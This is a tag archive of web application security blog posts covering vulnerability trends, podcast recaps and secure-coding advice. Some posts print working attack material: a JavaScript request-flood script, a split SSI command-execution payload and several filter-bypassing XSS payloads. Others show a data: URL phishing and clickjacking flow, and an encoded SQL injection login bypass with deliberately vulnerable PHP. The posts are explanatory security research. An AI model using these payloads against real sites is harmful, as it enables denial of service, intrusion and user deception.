Tag Archives: web application security

The Parabola of Reported WebAppSec Vulnerabilities

The nice folks over at Risk Based Security’s VulnDB gave me access to their extensive collection of vulnerability data, gathered over many years. As you can probably imagine, I was primarily interested in their remotely exploitable web application issues.

Looking at the data, the first thing I notice is the nice upward trend as the web began to really take off, and then the real birth of web application vulnerabilities in the mid-2000s. However, one thing that struck me as very odd was that we’ve been seeing a downward trend in web application vulnerabilities since 2008.

  • 2014 – 1607 [as of August 27th]
  • 2013 – 2106
  • 2012 – 2965
  • 2011 – 2427
  • 2010 – 2554
  • 2009 – 3101
  • 2008 – 4615
  • 2007 – 3212
  • 2006 – 4167
  • 2005 – 2095
  • 2004 – 1152
  • 2003 – 631
  • 2002 – 563
  • 2001 – 242
  • 2000 – 208
  • 1999 – 91
  • 1998 – 25
  • 1997 – 21
  • 1996 – 7
  • 1995 – 11
  • 1994 – 8

Assuming we aren’t seeing a downward trend in total compromises (which I don’t think we are), here are the reasons I think this could be happening:

  1. Code quality is increasing: It could be that we saw a huge increase in code quality over the last few years. This could be coming from compliance initiatives, better reporting of vulnerabilities, better training, source code scanning, manual code review, or any number of other places.
  2. A more homogeneous Internet: It could be that people are using fewer and fewer new pieces of code. As code matures, the people who use it are less likely to switch in favor of something new, which means there is less pressure for incumbent code to be replaced, and new frameworks are therefore less likely to be adopted. Software like WordPress, Joomla, or Drupal will likely take over more and more consumer publishing needs moving forward. All of the major Content Management Systems (CMS) have been heavily tested, and most have developed formal security response teams to address vulnerabilities. Even as they get tested more in the future, such platforms are likely a much safer alternative than anything else, thereby obviating the need for new players.
  3. Attacks may be moving towards custom web applications: We may be seeing a change in attacker tactics, where they are focusing on custom web application code (e.g. your local bank, PayPal, Facebook) rather than open source code used by many websites. Such vulnerabilities wouldn’t be reported in data like this, as vulnerability databases do not track site-specific vulnerabilities. The sites that do track such incidents are very incomplete, for a variety of reasons.
  4. People are disclosing fewer vulns: This is always a possibility when the ecosystem evolves to the point where reporting vulnerabilities is more annoying to researchers, provides them fewer benefits, and ultimately makes their lives more difficult than working with the vendors directly or holding onto their vulnerabilities. The growth of bug bounties, where researchers get paid for disclosing a newly found vulnerability directly to the vendor, is one example of an influence that may affect such statistics.

Whatever the case, this is an interesting trend and one that should be watched carefully. It could be a hybrid of a number of these factors as well, and we may never know for sure. But we should be aware of the data, because in it might hide some clues on how to further decrease the numbers. Another tidbit not expressed in the data above: there were 11,094 vulnerabilities disclosed in 2013, of which 6,122 were “web related” (meaning web application or web browser). While only 2,106 may be remotely exploitable (meaning it involves a remote attacker and there is published exploit code), context-dependent attacks (e.g. tricking a user into clicking a malicious link) are still a leading source of compromise, at least amongst targeted attacks. While vulnerability disclosure trends may be going down, organizational compromises appear to be just as common as they have ever been, or even more so. Said another way: compromises are flat or even up, while disclosures of new remotely exploitable web application vulnerabilities are down. Very interesting.

Thanks again to the Cyber Risk Analytics VulnDB guys for letting me play with their data.

#HackerKast 13 Bonus Round: FlashFlood – JavaScript DoS

In this week’s HackerKast bonus footage, I wrote a little prototype demonstrator script that shows various concepts regarding JavaScript flooding. I’ve run into this problem before, where people seem not to understand how this works, or even that it’s possible, despite multiple attempts to explain it over the years. So, it’s demo time! This is not at all designed to take down a website by itself, though it could add extra strain on the system.

What you might find, though, is that heavy, database-driven sites will start to falter if they rely on caching to protect themselves. Drupal sites, as an example, tend to be fairly prone to this issue because of how Drupal is constructed.

It works by sending tons of HTTP requests, using different parameter/value pairs each time, to bypass caching servers like Varnish. Ultimately it’s never a good idea for an adversary to run this kind of code directly, because the flood would come from their own IP address. Instead, it’s much more likely to be used by an adversary who tricks a large swath of people into executing the code. And as Matt points out in the video, it’s probably going to end up in XSS payloads at some point.
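
To make that concrete, here is a minimal sketch of the concept in JavaScript. This is not the actual FlashFlood script, and the target URL is a placeholder; the point is that every request carries a parameter/value pair the cache has never seen, so a URL-keyed cache like Varnish can never serve a hit, and every request falls through to the application:

var target = 'http://victim.example/'; // placeholder, not a real target
function flood() {
  // A unique query string on every request defeats URL-keyed caching.
  var cacheBuster = Math.random().toString(36).slice(2) + '=' + Date.now();
  new Image().src = target + '?' + cacheBuster; // fires a GET, no CORS needed
}
setInterval(flood, 10); // every visitor who runs this adds to the load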

Anyway, check out the code here. Thoughts are welcome, but hopefully this makes some of the concepts a lot more clear than our previous attempts.

Infancy of Code Vulnerabilities

I was reading something about modern browser behavior and it occurred to me that I hadn’t once looked at Matt’s Script Archive from the mid-1990s until now. I kind of like looking at old projects through the modern lens of hacking knowledge. What if we applied some modern-day knowledge of web application security to 20-year-old tech? So I took a look at WWWBoard. According to Google there are still thousands of installs of WWWBoard lying around the web:

http://www.scriptarchive.com/download.cgi?s=wwwboard&c=txt&f=wwwboard.pl

I was a little disappointed to see the following bit of text. It appears someone had beaten me to the punch – 18 years ago!

# Changes based in part on information contained in BugTraq archives
# message 'WWWBoard Vulnerability' posted by Samuel Sparling Nov-09-1998.
# Also requires that each followup number is in fact a number, to
# prevent message clobbering.

Taking a quick look, a number of vulns have been found in it over the years, four CVEs in all. But I decided to take a look at the code anyway. Who knows – perhaps some vulnerabilities have been found but others haven’t. After all, it has been nearly 12 years since the last CVE was announced.

Sure enough, it’s actually got some really vulnerable tidbits in it:

# Remove any NULL characters, Server Side Includes
$value =~ s/\0//g;
$value =~ s/<!--(.|\n)*-->//g;

The null removal is good, because there are all kinds of ways to sneak things past a Perl regex if you allow nulls. But that second substitution makes me shudder a bit. This code intentionally blocks typical SSI like:

<!--#exec cmd="ls -al" -->

But what if we break up the code? We’ve done this before for other things – like XSS, where filters blocked parts of the exploit so you had to break it up into two chunks that would be executed together once the page was re-assembled. But we’ve never (to my knowledge) talked about doing that for SSI! What if we slice it up into its required components, where:

Subject is: <!--#exec cmd="ls -al" echo='
Body is: ' -->

That would effectively run SSI code. Full command execution! Thankfully SSI is all but dead these days, not to mention Matt’s project is on its deathbed, so the real risk is negligible.
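
To see why the filter misses this, here is a small JavaScript illustration (the field handling is hypothetical; WWWBoard’s actual page assembly differs in the details). Each field is filtered in isolation, and neither half contains a complete comment, but the assembled page does:

// Same idea as WWWBoard's Perl substitution, applied per field.
var stripSSI = function (value) {
  return value.replace(/<!--(.|\n)*-->/g, '');
};

var subject = '<!--#exec cmd="ls -al" echo=\'';  // no closing -->, passes untouched
var body    = '\' -->';                          // no opening <!--, passes untouched

// The board stitches the filtered pieces into one page, and the
// server-parsed result now contains a complete SSI directive.
var page = '<h3>' + stripSSI(subject) + '</h3><p>' + stripSSI(body) + '</p>';

Now let’s look a little lower: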

$value =~ s/<([^>]|\n)*>//g;

This attempts to block any XSS. Ironically it should also block SSI, but let’s not get into the specifics here too much. It suffers from a similar issue.

Body is: <img src="" onerror='alert("XSS");'

Unlike SSI, I don’t have to worry about there being a closing comment tag – end angle brackets are a dime a dozen on any HTML page, which means that no matter what, this persistent XSS will fire on the page in question. While not as good as full command execution, it works on modern browsers more reliably than SSI does on websites.
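
The same field-at-a-time weakness is easy to demonstrate (an illustrative JavaScript rendering of the Perl substitution above):

var stripTags = function (value) {
  return value.replace(/<([^>]|\n)*>/g, '');
};

stripTags('<img src=x onerror=alert(1)>');          // '' -- a complete tag is removed
stripTags('<img src="" onerror=\'alert("XSS");\''); // unchanged -- no '>' for the regex to anchor on
// Once echoed into the page, the next '>' in the surrounding HTML
// closes the tag and the onerror handler fires.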

As I kept looking, I found all kinds of other issues that would lead to the board getting spammed like crazy; and in practice, when I went hunting for the board on the Internet, all I could find were either heavily modified boards that were password protected, or broken boards. That’s probably the only reason those thousands of boards aren’t fully compromised.

It’s an interesting reminder of exactly where we have come from and why things are so broken. We’ve inherited a lot of code, and even I still have snippets of Matt’s code buried in long-forgotten but still functional corners all over the web. We’ve inherited a lot of vulnerabilities, and our knowledge has substantially increased. It’s really fascinating to see how bad things really were, though, and how little security there really was when the web was in its infancy.

#HackerKast 11 Bonus Round: The Latest with Clickjacking!

This week Jeremiah said it was my turn to do a little demo for our bonus video, so I went back and decided to take a look at how Adobe had handled clickjacking in various browsers. My understanding was that they had done two things to prevent attackers from tricking users into granting access to the camera and microphone. The first was that they wouldn’t allow the Flash movie to sit in a 1×1 pixel iframe, which would otherwise hide the permissions dialog.

My second understanding was that they prevented pages from changing the opacity of the Flash movie or the surrounding iframe, so that the dialog couldn’t be obscured from view. So I decided to try it out!

It turns out that hiding it from view using opacity is still allowed in Chrome. Chrome has chosen to prevent the user from being duped with a permissions dialog that comes down from the ribbon. That is a fairly good defense. I would even argue that there is nothing exploitable here. But just because something isn’t exploitable doesn’t mean it’s clear to the user what’s going on, so I decided to take a look at how I would social engineer someone into giving me access to their camera and microphone.

So I created a small script that pops open the victim domain (say https://www.google.com/) so that the user can look at the URL bar and see that they are indeed on the correct domain. Popups have long been blocked, but only automatic ones; user-initiated popups are still allowed and “pop” up into an adjacent tab. Because I still have a reference to the popup window from the parent, I can easily send it somewhere other than Google after some time elapses.

At this point I send it to a data: URL, which allows me to inject content onto the page. A little trick makes the browser look an awful lot like it’s still on Google, which makes this super useful for phishing and other social engineering attacks, though not necessarily a vuln either. The URL basically claims that the charset is “https://www.google.com/” followed by a bunch of spaces, instead of “utf-8” or whatever it would normally be. That makes it look an awful lot like you’re still on Google’s site, but you are in fact seeing content from ha.ckers.org. So yeah, imagine that being a login page instead of a clickjacking page and you’ve got a good idea how an attacker would be most likely to use it.
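
Here is a sketch of that flow (illustrative only: the element, timing, and content are invented, and browsers have since tightened script-driven navigation to data: URLs):

var popup; // a reference to the user-initiated popup survives in the parent
document.getElementById('bait').onclick = function () {
  popup = window.open('https://www.google.com/'); // victim checks the URL bar, sees Google
  setTimeout(function () {
    // After the victim has inspected the address, swap the tab's content.
    // The bogus "charset" makes the start of the data: URL read like Google's
    // address, and the run of spaces pushes the real content out of view.
    popup.location = 'data:text/html;charset=https://www.google.com/' +
        Array(200).join(' ') + ',<h1>Content from somewhere else entirely</h1>';
  }, 15000);
};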

At that point the user is presented with a semi-opaque Flash movie and asked to click twice (once to instantiate the plugin and once to allow permissions). Typically if I were really doing this I would host it on a domain like “gcams.com” or “g-camz.com” or whatever so that the dialog would look like it’s trying to include content from a related domain.

The user is far more likely to allow Google to have access to their camera and microphone than ha.ckers.org, of course, and this problem is exacerbated by the fact that people are accustomed to sites including tons of other domains and sub-domains belonging to other companies and subsidiaries. In Google’s case, googleusercontent.com, gstatic.com, etc. are all places that people have come to recognize and trust as being part of Google, but the same is true of lots of domains out there.

Anyway, yes, this is probably not a vuln, and after talking with Adobe and the Chrome team, they agree, so don’t expect any sort of fix from what I can gather. This is just how it works. If you want to check it out, you can click here with Chrome to try the demo. I hope you enjoyed the bonus video!

Resources:
Wikipedia: Clickjacking

#HackerKast 11: WordPress XSS Vuln, $90 PlayStation 4s and CryptoPHP Backdoor

Happy Late Thanksgiving everybody! We started out this week going around talking about how thankful we are about browser insecurity, web application security, and the Texas cold front.

The first story we talked about was a crazy, widespread new XSS vulnerability in a WordPress Statistics “plugin” (I put plugin in quotes here because as of September 90% of sites had this WP-Statistics plugin installed, a figure that is down to about 86% at the time of this post). The commenting system here is very blatantly vulnerable to XSS, which leaves me confused as to how this took so long to come to light.

The proof of concept the researchers associated with this blog post was very nasty, as this is a persistent XSS vulnerability. An attacker can leave a comment on a blog post; when the admin of the WordPress blog goes to approve the comment, the payload steals that admin’s session cookies and sends them to the attacker. Other possibilities include changing the current admin password, adding a new admin account, or using the plugin editor to write your own malicious PHP code and execute it instantly.

Next, we spoke about a clever, less-technical business logic hack against Walmart. People were taking advantage of Walmart’s price-matching clause by standing up fake online retailers with lower prices. These pages would look legitimate enough but were in no way actual retailers. The most widespread use of this, and the one that caught the attention of the right folks, was people getting PlayStation 4s for $90. Robert was very upset that he only heard about this after Walmart tightened their security controls.

Robert then gave us an overview of a new backdoor malware that is taking advantage of common blog plugins. These hackers were creating legitimate-looking add-ons by making near-exact mirrors of WordPress, Joomla, Drupal, etc. plugins and themes. The attack itself is a combination of phishing and malware: they would trick the admins of these blogs into installing near-mirror copies of the plugins with the addition of a backdoor called CryptoPHP. The solution is the hard, age-old problem of deciding where, and whom, to trust when downloading any code you are going to install and execute.

Lastly, Jeremiah didn’t shy away from some shameless self-promotion of a blog post we put out about the characteristics of what makes an attack “sophisticated.” This is an interesting, blood-boiling topic for a few of us who have been around for a while. We see press releases come out all the time claiming a recent breach was caused by a “sophisticated attack,” only to find out later that it was a plain vanilla SQL injection. Jeremiah decided to step up and try to define what is needed to actually claim a sophisticated attack. This is by no means a complete list, but it is certainly a start, and we welcome any and all feedback.

This week’s bonus footage comes from Robert who walked us through some cool research around clickjacking. Check it out!

Resources:
CryptoPHP Backdoor Hijacks Servers with Malicious Plugins and Themes
Scam Tricks Walmart into Selling $90 PS4s
Death by Comments: WordPress XSS Vuln is Biggest in Years
5 Characteristics of a ‘Sophisticated Attack’

#HackerKast 8: Recap of JPMC Breach, Hacking Rewards Programs and TOR Version of Facebook

After making fun of RSnake being cold in Texas, we started off this week’s HackerKast with some discussion about the recent JP Morgan breach. We received more details about the breach that affected 76 million households last month, including confirmation that it was indeed a website that was hacked. As we have seen more often in recent years, the hacked website was not one of their main webpages but a one-off brochureware-type site built to promote and organize a company-sponsored running race event.

This shift in attacker focus is something we in the AppSec world have taken notice of and are realizing we need to protect against. Historically, if a company did any web security testing or monitoring, the main (and often only) focus was on the flagship websites. Now we are all learning the hard way that tons of other websites, created for smaller or more specific purposes, are either hooked up to the same database or can easily serve as a pivot point to a server that does talk to the crown jewels.

Next, Jeremiah touched on a fun little piece from our friend Brian Krebs over at Krebs on Security, who was pointing out the value to attackers in targeting credit card rewards programs. Instead of attacking the card itself, the blackhats are compromising rewards websites, liquidating the points, and cashing out. One major weakness pointed out here is that most of these types of services gate your reward points account with a four-digit PIN. Robert makes a great point that even if they move from four-digit PINs to a password system, that only makes brute forcing more difficult; if the bad guys find value here, they’ll just update current malware strains to attack these types of accounts.

Robert then talked about a new Tor onion-network version of Facebook that has been set up to allow anonymous use of the site. There is the obvious use case of people trying to browse at work without getting in trouble, but the more important one is people in oppressive countries who want to get information out without worrying about prosecution and personal safety.

I brought up an interesting bug bounty shared around the blogosphere this week by a researcher named Patrik, who found a fun XSS bug in Google. I was a bit sad (Jeremiah would say jealous) that he got $5,000 for the bug, but it was certainly a cool one. The XSS was found by uploading a JSON file to a Google SEO service called Tag Manager. All of the inputs on Tag Manager were properly sanitized in the interface, but it allowed you to upload this JSON file, which had some additional configs and inputs for SEO tags. This file was not sanitized, so an XSS injection could be stored, making it persistent and delivered via file upload. Pretty juicy stuff!

Finally, we wrapped up with some more Google talk: a bypass of Gmail two-factor authentication. Specifically, the attack in question goes after the text-message implementation of 2FA, not the token-generating app that Google puts out. There are a number of ways this can happen, but the particular, most recent story involves attackers calling up mobile providers and social-engineering their way into access to text messages in order to grab the second-factor token and compromise the Gmail account.

That’s it for this week! Tune in next week for your AppSec “what you need to know” cliff notes!

Resources:
J.P. Morgan Found Hackers Through Breach of Road-Race Website
Thieves Cash Out Rewards, Points Accounts
Why Facebook Just Launched Its Own ‘Dark Web’ Site
[BugBounty] The 5000$ Google XSS
How Hackers Reportedly Side-Stepped Google’s Two-Factor Authentication

Teaching Code in 2014

Guest post by JD Glaser

“Wounds from a friend can be trusted, but an enemy multiplies kisses” – Proverbs 27:6

This proverb, over 2,000 years old, is directly applicable to all authors of programming material today. By avoiding security coverage, by explicitly teaching insecure examples, authors do the world at large a huge disservice by multiplying both the effect of incorrect knowledge and the development of insecure habits in developers. The teacher is the enemy when their teachings encourage poor practices through example, which ultimately bites the student in the end at no cost to the teacher. In fact, if you are skilled enough to be an effective teacher, the problem is worse than for poor teachers. Good teachers by virtue of their teaching skill greatly multiply the ‘kisses’ of poor example code that eventually becomes ‘acceptable production code’ ad infinitum.

So, to the authors of programming material everywhere, whether you write books or blogs, this article is targeted at you. By choosing to write, you have chosen to teach. Therefore you have a responsibility.

No Excuse for Demonstrating Insecure Code Examples

This is the year 2014. There is simply no excuse for not demonstrating and explaining secure code within the examples of your chosen language.

Examples are critical. First, examples teach. Second, examples, one way or the other, find their way into production code. This is a simple fact with huge ramifications. Once a technique is learned, once that initial impact is made upon the mind, that newly learned technique becomes the way it is done. When you teach an insecure example, you perpetuate that poor knowledge in the world and it repeats itself again and again.

Change is difficult for everyone. Pepsi learned this the expensive way. Once people accepted that Coke was It, the hundreds of millions of dollars spent on really cool advertising were not able to change that mindset. The mind has only one slot for number one, and Pepsi has remained second ever since. Don’t continue to reinforce the idea that security comes second.

Security Should Be Ingrained, Not Added

When teaching, even if you are ‘just’ calculating points on a sample graph for those new to chart programming, if any of that data comes from user supplied input via that simple AJAX call to get the user going, your sample code should filter that sample data. When you save it, your sample code should escape it for the chosen database; when you display it to the user, the sample code of your chosen language should escape it for the intended display context. When your sample data needs to be encrypted, your sample code should apply modern cryptography. There are no innocent examples anymore.
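
As a tiny illustration of what that looks like in practice, even a throwaway chart demo can carry both habits. A sketch in JavaScript, with function names of my own invention:

// 1) Filter input: coerce untrusted values into the type you expect.
function toPoints(raw) {
  return raw.map(Number).filter(isFinite); // non-numeric junk is dropped
}

// 2) Escape output for the context it lands in -- here, HTML.
function escapeHTML(s) {
  return String(s).replace(/&/g, '&amp;').replace(/</g, '&lt;')
                  .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

var untrusted = ['3', '7', '<script>alert(1)</script>'];
console.log(toPoints(untrusted));      // [ 3, 7 ]
console.log(escapeHTML(untrusted[2])); // renders as text, not markup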

Security should be ingrained, not added. Programmers need to be trained to see security measures in line with normal functionality. In this way, they are trained to incorporate security measures initially as code is written, and also to identify when security measures are missing.

When security measures are removed for the sake of ‘clarity,’ the student is unconsciously being taught that security makes things less clear. The student is also being trained, directly by example, to add security ‘later.’

Learning Node.js In 2014

Most of the latest Node.js books have some great material, but only one out of several took the time to properly teach, via integrated code examples, how to properly escape data for MySQL in Node.js. Kudos to Pedro Teixeira, who wrote Professional Node.js from Wrox Press, for teaching proper security measures as an integral part of the lesson to those adapting to Node.js.

Contrast this with Node.js for PHP Developers from O’Reilly Press, where the examples explicitly demonstrate how to insecurely code Node.js with SQL Injection holes. The code in this book actually teaches the next new wave how to code wide open vulnerabilities to servers. Considering the rapid adoption of Node.js for server applications, and the millions who will use it, this is a real problem.
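
For contrast in miniature, here is the difference using the node mysql driver’s placeholder support (a sketch; the connection details and table names are invented for illustration):

var mysql = require('mysql');
var connection = mysql.createConnection({
  host: 'localhost', user: 'app', password: 'secret', database: 'shop'
});
var userInput = "anything'; DROP TABLE users; --"; // hostile input

// The legacy pattern: string concatenation, wide open to SQL injection.
var vulnerable = "SELECT * FROM users WHERE name = '" + userInput + "'";

// The pattern worth teaching: placeholders, escaped by the driver itself.
connection.query('SELECT * FROM users WHERE name = ?', [userInput],
  function (err, rows) {
    if (err) throw err;
    console.log(rows); // the hostile input was treated as data, not SQL
  });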

The fact that the retired legacy method of building SQL statements through insecure string concatenation was chosen by the author as the instruction method for this book really demonstrates the power of ingrained learning. Once something is learned, for good or bad, a person keeps repeating what they know for years. Again, change is difficult.

The developers taught by these code examples will build apps that we may all use at some point. The security vulnerabilities they contain will affect everyone. It makes one wonder whether you are the author whose book or blog taught the person who coded the latest Home Depot penetration. This is code that will have to be retrofitted later, at great time and great expense. It is not a theoretical problem. It has a large dollar figure attached to its cost.

For some reason, authors of otherwise good material choose to avoid teaching security in an integral way. Either they are not knowledgeable about security, in which case it is time to up their game, or they have fallen into the ‘clarity omission’ trap. This is a widespread practice, adopted by almost everyone, of declaring that since ‘example code’ is not production code, insecure code is excusable, and therefore critical facts are not presented. This is a mistake with far-reaching implications.

I recently watched a popular video on PHP training from an instructor who is in all other respects a good instructor. Apparently, this video has educated at least 15,000 developers so far. In it, the author briefly states that output escaping should be done. However, in his very next statement, he declares that for the sake of brevity the technique won’t be demonstrated, and the examples given out as part of the training do not incorporate it. The opportunity to ingrain the idea that output escaping is necessary, and that it should be an automated part of a developer’s toolkit, has just been lost on the majority of those 15,000 students, because the code to which they will later turn for reference is lacking. Most, if not all, will ignore the practice until mandated by an external force.

Stop the Madness

In the real world, when security is not incorporated at the beginning, it costs additional time and money to retrofit it later. This cost is never paid until a breach is announced on the front page of a news service and someone is sued for negligence. Teachers have a responsibility to teach this.

Coders code as they are taught. Coders are primarily taught through books and blog articles. Blog articles are especially critical for learning as they are the fastest way to learn the latest language technique. Therefore, bloggers are equally at fault when integrated security is absent from their examples.

The fact is that if you are a writer, you are a trainer. You are in fact training a developer how to do something over and over again. Security should be integral. Security books on their own, as secondary topics, should not be needed. Think about that.

The past decade has been spent railing against insecure programming practices, but the question needs to be asked, who is doing the teaching? And what is being taught?

You, the writer, are at the root of this widespread security problem. Again, this is 2014 and these issues have been in the spotlight for 10+ years. This is not about mistakes, or about being a security expert. This is about the complete avoidance of the basics. What habit is a young programmer learning now that will affect the code going into service next year, and the years after?

The Truth Hurts

If you are still inadvertently training coders how to write blatantly insecure code, either through ignorance or omission, you have no business training others, especially if you are successful. If you want to teach, if you make money teaching programming, you need to stop the madness, educate yourself, and reverse the trend.

Write those three extra lines of filtering code and add that extra paragraph explaining the purpose. Teach developers how to see security ingrained in code.

Stop multiplying the sweet kiss of simplicity and avoidance. Stop making yourself the enemy of those who like to keep their credit cards private.

About JD
In his own words JD, “Did a brief stint of 15 years in security. Headed the development of TripWire for Windows and Foundscan. Founded NT OBJECTives, a company to scan web stuff. BlackHat speaker on Windows forensic issues. Built the Windows Forensic Toolkit and FPort, which the Department of Justice has used to help convict child pornographers.”

Raising the CSRF Bar

For years, we at WhiteHat have been recommending tokenization as the number one protection from Cross Site Request Forgery (CSRF). Just having a token is not enough, of course: it must be cryptographically strong, sufficiently random, and properly validated on the server. I can’t stress that last point enough, as the first thing I try when I see a CSRF token is to empty out the value and see if the form submission is accepted as valid.

Historically, the bar for “good enough” when it comes to CSRF tokens was whether the token was changed at least once per session.

For example: a user logs in, and a token is generated and attached to their authenticated session. That token is used for that user on all sensitive/administrative forms that are to be protected against CSRF. As long as the user received a new token upon logging out and back in, and the old one was invalidated, that met the bar for “good enough.”

Not anymore.

Thanks to some fellow security researchers who are much smarter than I am when it comes to crypto chops (Angelo Prado, Neal Harris, and Yoel Gluck), and their latest attack on SSL (which they dubbed BREACH), that no longer suffices.

BREACH is an attack on HTTP response compression algorithms, like gzip, which are very popular. Make your giant HTTP responses smaller, and therefore faster for your users? No-brainer. Well, now, thanks to the BREACH attack, within around 1,000 requests an attacker can pull sensitive SSL-encrypted information out of HTTP responses... sensitive information such as CSRF tokens!

The bar must be raised. We can no longer allow tokens to stay the same for an entire session if response compression is enabled. To combat this, CSRF tokens need to be generated for every request/response. That way they cannot be stolen by making 1,000 requests against a consistent token.
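
In practice the rotation can be as simple as this sketch (Node-style JavaScript; the session plumbing and framework wiring are assumed, not prescribed):

var crypto = require('crypto');

// Issue a fresh, cryptographically strong token with every response.
function issueToken(session) {
  session.csrfToken = crypto.randomBytes(32).toString('hex');
  return session.csrfToken; // embed this in the rendered form
}

// Validate on every state-changing request, then retire the token.
function validateToken(session, submitted) {
  var expected = session.csrfToken;
  session.csrfToken = null; // single use: a token recovered via BREACH is already dead
  // An empty or missing submitted value must fail, too.
  return Boolean(expected) && Boolean(submitted) && expected === submitted;
}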

TL;DR

  • Old “good enough” – CSRF Tokens unique per session
  • BREACH (BlackHat 2013)
  • New “good enough” – CSRF Tokens must be unique per request if HTTP Response compression is being used.

The Insecurity of Security Through Obscurity

The topic of SQL injection (SQLi) is well known to the security industry by now. From time to time, researchers will come across a vector so unique that it must be shared. In my case I had this gibberish — &#MU4<4+0 — turn into an exploitable vector due to some unique coding done on the developers’ end. So, as all stories go, let’s start at the beginning.

When we come across a login form in a web application, there are a few go-to testing strategies. Of course the first thing I did in this case was submit a login request with a username of admin and a password of ' OR 1=1--. To no one’s surprise, the application responded with a message about incorrect information. However, the application did respond in an unusual way: the password field had ( QO!.>./* in it. My first thought was, “What is the slim chance they just returned to me the real admin password? It looks like it was randomly generated at least.” So, of course, I submitted another login attempt, but this time I used the newly obtained value as the password. This time I got a new value returned to me on the failed login attempt: ) SL"+?+1'. Not surprisingly, they did not properly encode the HTML markup characters in this new response, so if we can figure out what is going on we can certainly get reflected Cross Site Scripting (XSS) on this login page. At this point it’s time to take my research to a smaller scale and attempt to understand what is going on here on a character-by-character level.

The next few login attempts submitted were intended to scope out what was going on. By submitting three requests with a, b, and c, it may be possible to see a bigger picture starting to emerge. The response for each appears to be the next letter in the alphabet — we got b, c, and d back in return. So as a next step, I tried to add on a bit to this knowledge. If we submit aa we should expect to get bb back. Unfortunately things are never just that easy. The application responded with b^ instead. So let’s see what happens on a much larger string composed of the same letter; this time I submitted aaaaaaaaaaaa (that’s 12 ‘a’ characters in a row), and to my surprise got this back b^c^b^b^c^b^. Now we have something to work with. Clearly there seems to be some sort of pattern emerging of how these characters are transforming — it looks like a repeating series. The first 6 characters are the same as the last 6 characters in the response.

So far we have only discussed these characters in their human readable format that you see on your keyboard. In the world of computers, they all have multiple secondary identities. One of the more common translations is their ASCII numerical equivalent. When a computer sees the letter ‘a’ the computer can also convert that character into a number, in this case 97. By giving these characters a number we may have an easier time determining what pattern is going on. These ASCII charts can be found all over the Internet and to give credit to the one I used, www.theasciicode.com.ar helped out big time here.

Since we have determined that there is a pattern repeating every 6 characters, let’s figure out what this shift actually looks like numerically. We start off by injecting aaaaaa and, as expected, get back b^c^b^. But what does this look like if we use the ASCII numerical equivalents instead? Now, in the computer world, we are injecting 97,97,97,97,97,97 and we get back 98,94,99,94,98,94. From this view it looks like each position has its own unique shift being applied to it. Surely everyone loved matrices as much as I did in math class, so let’s bust out some of that old matrix subtraction: [97,97,97,97,97,97] - [98,94,99,94,98,94] = [-1,3,-2,3,-1,3]. Now we have a series that we can apply to the ASCII numerical equivalent of what we want to inject in order to get it to reflect the way we want.
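
Applying the series is mechanical. Here is a quick JavaScript sketch of the attacker-side encoder (my own helper, not anything the application exposes):

// Shift each character of the desired payload by the recovered series,
// so the application's transform turns the submission back into the payload.
function encode(payload) {
  var shifts = [-1, 3, -2, 3, -1, 3];
  var out = '';
  for (var i = 0; i < payload.length; i++) {
    out += String.fromCharCode(payload.charCodeAt(i) + shifts[i % 6]);
  }
  return out;
}

encode('b^c^b^'); // 'aaaaaa' -- round-trips the probe we observed above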

Finally, it’s time to start forming a Proof of Concept (PoC) injection to exploit this potential XSS issue. So far we have found that there is a repeating pattern of 6 character shifts being applied to our input, and we have determined the exact shift occurring at each position. If we apply the correct character shifts to an exploitable injection, such as "><img/src="h"onerror=alert(2)//, we would need to submit it as !A:llj.vpf<%g%mqduqrp@`odur+1,.2. Of course, seeing that alert box pop up is the visual verification needed that we have reverse engineered what is going on.

Since we have a working PoC for XSS, let’s revisit our initial testing for SQL injection. When we apply the same character shifts that we discovered to ' OR 1=1--, we find that it needs to be submitted as &#MU4<4+0. One of the space characters in our injection is being shifted by -1, which results in a non-printable character between the ‘U’ and the ‘4’. With the proper URL encoding applied, it would appear as %26%23MU%1F4%3C4%2B0 when being sent to the application. It was a glorious moment when I saw this application authenticate me as the admin user.

Back in the early days of the Internet, and well before I even started learning about information security, this type of attack was quite popular. In current times, developers are commonly using parameterized queries properly on login forms, so finding this type of issue has become quite rare. Unfortunately, this particular app was not created for the US market and was probably developed by very green coders in a newly developing country. This was their attempt at encoding users’ passwords, when we all know passwords should be hashed. Had this application not returned any content in the password field on failed login attempts, this SQL injection vulnerability would have remained perfectly hidden from any black-box testing through this method. This highlights one of the many ways a vulnerability may exist but be obscured from those testing the application.

For those still following along, I have provided my interpretation of what the backend code may look like for this example. By flipping the + and - around, I could also use this same code to properly encode my injection so that it reflects the way I want it to:


<!DOCTYPE html>
<html>
<body>
<form name="login" action="#" method="post">
<?php
$strinput = $_POST['password'];
$strarray = str_split($strinput);
// Repeating six-character shift: +1, -3, +2, -3, +1, -3 (matches the observed
// behavior, e.g. 'a' -> 'b'). Flip the signs and this same loop encodes an
// injection instead.
$shifts = array(1, -3, 2, -3, 1, -3);
for ($i = 0; $i < strlen($strinput); $i++) {
    $strarray[$i] = chr(ord($strarray[$i]) + $shifts[$i % 6]);
}
$password = implode($strarray);
echo "Login:<input type=\"text\" name=\"username\" value=\"" . htmlspecialchars($_POST['username']) . "\"><br>\n";
// The shifted password is echoed without htmlspecialchars() -- the reflected XSS.
echo "Password:<input type=\"password\" name=\"password\" value=\"" . $password . "\"><br>\n";
// --- CODE SNIP ---
// The shifted password is concatenated into the query unescaped -- the SQL injection.
$examplesqlquery = "SELECT id FROM users WHERE username='" . addslashes($_POST['username']) . "' AND password='$password'";
// --- CODE SNIP ---
?>
<input type="submit" value="submit">
</form>
</body>
</html>

Aviator: Some Answered Questions

We publicly released Aviator on Monday, Oct 21. Since then we’ve received an avalanche of questions, suggestions, and feature requests regarding the browser. The level of positive feedback and support has been overwhelming. Lots of great ideas and comments that will help shape where we go from here. If you have something to share, a question or concern, please contact us at aviator@whitehatsec.com.

Now let’s address some of the most often heard questions so far:

Where’s the source code to Aviator?

WhiteHat Security is still in the very early stages of Aviator’s public release and we are gathering all feedback internally. We’ll be using this feedback to prioritize where our resources will be spent. Deciding whether or not to release the source code is part of these discussions.

Aviator utilizes open source software via Chromium; don’t you have to release the source?

WhiteHat Security respects and appreciates the open source software community. We’ve long supported various open source organizations and projects throughout our history. We also know how important OSS licenses are, so we diligently studied what would be required before Aviator could be made publicly available.

